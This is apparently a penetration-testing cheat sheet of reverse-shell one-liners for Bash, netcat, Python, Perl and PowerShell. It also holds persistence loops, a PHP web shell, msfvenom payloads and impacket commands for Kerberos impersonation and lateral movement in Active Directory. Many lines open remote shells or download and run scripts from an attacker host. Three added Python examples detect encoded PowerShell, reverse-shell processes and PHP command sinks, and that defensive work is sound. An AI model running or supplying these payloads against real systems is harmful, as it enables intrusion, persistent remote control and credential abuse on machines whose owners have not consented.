Reverse Shell
Linux
#Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'
#netcat
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 443 >/tmp/f
#php
#(with proc_open & proc_close - shell.phar)
<?php
// proc_open shell: stdin and stdout are pipes, stderr is appended to a file
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    // the command written to sh's stdin runs once the pipe is closed
    fwrite($pipes[0], "nc 127.0.0.1 9001");
    fclose($pipes[0]);
    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>
#python injection input
__import__('os').system('whoami')
#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
Windows
nc64.exe
nc64.exe -e cmd.exe <IP> 443
#Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File shell.ps1
#Execute file remotely
IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker ip>/shell.ps1')
# Invoke-PowershellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1
# 1. setup python http server
# 2. execute
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1')
#or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1
# encode payload
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0
powershell -enc <encode payload>
# Execute command without crashing the previous shell
# 1. pwn.ps1
Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe
# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri <attacker ip>/pwn.ps1 -usebasicparsing)"
# note: you could change the payload in the pwn.ps1 if your payload doesn't work.
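Defenders see the commands in this Windows section mostly as process-creation events (Sysmon Event ID 1, or Security 4688 with command-line logging) where the script body is hidden behind -enc. The Python helper below is an added example, not code from this cheat sheet: it reverses the iconv -t utf-16le | base64 -w 0 encoding shown above (UTF-16LE without a BOM, which is what powershell.exe expects) and then scores the outer command line plus the decoded script for the download-cradle and execution-policy indicators that appear on this page. The indicator list, the weights, and the three constructed command lines are this example's own assumptions.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; capture the base64 blob.
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)",
    re.I,
)

# Indicator regexes with weights; weights and threshold are this example's own scheme.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
        re.I), 2),
    ("tcp_client", re.compile(r"net\.sockets\.tcpclient", re.I), 3),
    ("execpolicy_bypass", re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I), 1),
    ("stealth_flags", re.compile(r"-(?:w|window|windowstyle)\s+hidden|-noni(?:nteractive)?\b", re.I), 1),
]
THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(cmdline):
    """Score the raw command line together with its decoded payload (if any)."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(text)]
    # an encoded command is itself worth one point: legitimate admin scripts rarely need it
    score = sum(w for _, w in hits) + (1 if decoded is not None else 0)
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": sorted(name for name, _ in hits),
        "score": score,
        "suspicious": score >= THRESHOLD,
    }


def encode_for_demo(script):
    """Mirror `iconv -t utf-16le | base64 -w 0`: UTF-16LE without BOM, single-line base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a bypass/IEX cradle, an encoded download cradle, and a benign admin call.
DEMO_SCRIPT = "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.27/shell.ps1')"
SAMPLES = [
    'powershell -ep bypass -c "iex(iwr -uri http://10.10.14.27/pwn.ps1 -usebasicparsing)"',
    "powershell -NoP -NonI -W Hidden -enc " + encode_for_demo(DEMO_SCRIPT),
    "powershell -NoProfile -Command Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for line in SAMPLES:
        r = analyze(line)
        print(f"score={r['score']} suspicious={r['suspicious']} indicators={r['indicators']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Decoding before matching is the point: an IEX or DownloadString rule that only inspects the raw command line never sees an encoded payload.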
Shell Stabilization (Linux)
When?
Note:
[Ctrl + C] only works if the machine has bash as the default shell;
use "clear" instead.
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'
Keyboard shortcut: [Ctrl + Z] (background the process)
stty raw -echo ; fg ; reset
stty columns 200 rows 200
Persistence Reverse Shell
Important: run the persistent shell before executing anything else.
Linux
while :; do setsid bash -i &>/dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done &>/dev/null &
nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &
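From the defender's side, the Linux one-liners in the Reverse Shell section above and the persistence loops here leave recognisable traces in process command lines: /dev/tcp/ redirections, nc -e, mkfifo pipelines, os.dup2 onto descriptors 0-2, Perl open(STDIN,">&S"), and setsid/nohup wrappers around an interactive shell. The Python detector below is an added example and not part of this cheat sheet. It runs over constructed process records (pid, ppid, user, args), the shape you get from ps -eo pid,ppid,user,args or auditd EXECVE events; the rule weights, the threshold, and the service-account list are this example's own assumptions.

```python
import re

# Rules keyed to the reverse-shell one-liners on this page: (name, regex, weight).
# Weights and THRESHOLD are this example's own choices, not a standard.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"), 4),
    ("netcat_exec", re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-e\s+\S*(?:sh|cmd\.exe)\b"), 4),
    ("mkfifo_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*\S*sh\s+-i.*\|\s*(?:nc|ncat|netcat)\b"), 4),
    ("python_dup2", re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)"), 3),
    ("perl_fd_redirect", re.compile(r'open\(STD(?:IN|OUT|ERR)\s*,\s*"?>&\w+"?\)'), 3),
    ("pty_spawn", re.compile(r"pty\.spawn\("), 1),
    ("interactive_shell", re.compile(r"\b(?:ba)?sh\s+-i\b"), 1),
    ("background_loop", re.compile(r"\b(?:setsid|nohup)\b"), 1),
]
# Accounts that should never spawn interactive shells (assumed list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "httpd", "tomcat", "nobody"}
THRESHOLD = 3

# Constructed process records (pid, ppid, user, args) built from the page's one-liners
# (the Python and Perl ones trimmed) plus benign look-alikes.
SAMPLE_PROCS = [
    (1201, 1, "www-data", "bash -c bash -i >& /dev/tcp/10.10.14.27/443 0>&1"),
    (1333, 1201, "www-data", "nc 10.10.14.27 4444 -e /bin/bash"),
    (1410, 1, "root", "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.27 443 >/tmp/f"),
    (1502, 980, "ubuntu", 'python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
                          's.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
                          'os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'),
    (1600, 1, "ubuntu", 'perl -e use Socket;$i="10.10.14.27";$p=2323;open(STDIN,">&S");open(STDOUT,">&S");'
                        'open(STDERR,">&S");exec("sh -i");'),
    (1700, 1, "www-data", "setsid bash -i &>/dev/tcp/10.10.14.27/443 0>&1"),
    (2001, 1, "ubuntu", "nc -zv 10.0.0.5 22"),
    (2002, 980, "ubuntu", "python3 manage.py runserver"),
    (2003, 1, "root", "/usr/sbin/sshd -D"),
]


def score_process(cmdline):
    """Return (matched rule names in RULES order, weighted score) for one command line."""
    hits = [name for name, rx, _ in RULES if rx.search(cmdline)]
    score = sum(w for name, _, w in RULES if name in hits)
    return hits, score


def scan(procs):
    """Return findings for records whose score reaches THRESHOLD."""
    findings = []
    for pid, ppid, user, cmdline in procs:
        hits, score = score_process(cmdline)
        # a shell indicator under a web-server account is worth extra weight
        if hits and user in SERVICE_ACCOUNTS:
            hits.append("service_account_shell")
            score += 2
        if score >= THRESHOLD:
            findings.append({"pid": pid, "ppid": ppid, "user": user,
                             "score": score, "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PROCS):
        print(f"pid={f['pid']} user={f['user']} score={f['score']} rules={','.join(f['rules'])}")
```

A single low-weight hit is not a verdict: pty.spawn and bash -i also appear in legitimate admin sessions (and in the stabilization steps below), which is why those rules carry weight 1 and only the combined score crosses the threshold.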
Windows
need to upload nc.exe
start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
Web Shell
PHP
cmd --> shell.php
<?php
echo system($_REQUEST['cmd']);
?>
$URL/shell.php?cmd=id
note: the simple way is to use Burp Suite Repeater to run a command;
change the GET request to a POST request for a better input experience.
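A defender reviewing a PHP deployment wants to find sinks like the system($_REQUEST['cmd']) one-liner above, and the proc_open("sh", ...) shell from the PHP reverse-shell section, in source before anyone else does. The scanner below is an added example, not code from this page: it flags command and eval sinks whose argument is a request superglobal or a variable assigned from one, plus proc_open/popen calls that launch a bare shell. Its sink list, the one-pass top-to-bottom taint propagation, and the constructed sample file are assumptions of the example, not a complete PHP static analysis.

```python
import re

# Sinks that hand their argument to a shell or the PHP interpreter (assumed list, not exhaustive).
SINKS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(([^)]*)\)", re.I)
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")
# `$var = <rhs>;` (but not `==`); drives one-pass taint propagation in file order.
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*([^;]+);")
VARREF = re.compile(r"\$[A-Za-z_]\w*")
# First argument of proc_open/popen is a bare shell such as "sh" or "/bin/bash".
SHELL_ARG = re.compile(r"""^\s*["'](?:/bin/)?(?:ba)?sh["']""", re.I)


def scan_php(source):
    """Return [(line_no, sink, reason)] for request-controlled or shell-spawning sink calls."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        # propagate taint: lhs becomes tainted if rhs reads a superglobal or a tainted var
        for m in ASSIGN.finditer(line):
            lhs, rhs = m.group(1), m.group(2)
            if SUPERGLOBAL.search(rhs) or any(v in tainted for v in VARREF.findall(rhs)):
                tainted.add(lhs)
        for m in SINKS.finditer(line):
            sink, args = m.group(1).lower(), m.group(2)
            if SUPERGLOBAL.search(args):
                findings.append((lineno, sink, "request data passed directly to sink"))
            elif any(v in tainted for v in VARREF.findall(args)):
                findings.append((lineno, sink, "request-tainted variable reaches sink"))
            elif sink in ("proc_open", "popen") and SHELL_ARG.match(args):
                findings.append((lineno, sink, "sink launches an interactive shell"))
    return findings


# Constructed sample mixing this page's shell.php, its proc_open shell, and benign calls.
SAMPLE_PHP = """<?php
// constructed sample for the scanner above
echo system($_REQUEST['cmd']);
$c = $_GET['c'];
$d = $c;
passthru($d);
system("ls -la /var/log");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
eval(base64_decode($_POST['x']));
?>"""

if __name__ == "__main__":
    for lineno, sink, reason in scan_php(SAMPLE_PHP):
        print(f"line {lineno}: {sink}() - {reason}")
```

The benign system("ls -la /var/log") on line 7 produces no finding because nothing request-controlled reaches it; a real review would still list every sink call for a human to confirm.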
IIS
ASPX run Shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=443 -f aspx
or
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.1 LPORT=443 -f aspx
Dig deeper
https://github.com/tennc/webshell
Windows NT Authority shell from Administrator
psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
Shell to another user in Active Directory
note: powershell
Convert credentials
$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential "<username>", $pw
Command
Invoke-Command -ComputerName 127.0.0.1 -Credential $creds -ScriptBlock { whoami }
after login, run powerview.
Shell with silver ticket
If the domain user has constrained delegation privileges,
you can use the -impersonate flag to request a ticket on behalf of another user,
for example:
# example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator
Request ticket
# username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
# NTLM Hash
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <ntlm hash>:<ntlm hash>
Save ticket to env
export KRB5CCNAME=Administrator.ccache
Login with ticket
impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Login using Impacket (need local admin creds)
These need valid credentials; if one command fails, try the next one below.
# test with crackmapexec smb
impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP
# wmi port
impacket-wmiexec <domain>/<username>@$IP
# test with crackmapexec winrm (WinRM, port 5985)
evil-winrm -i $IP -u <username> -p <password>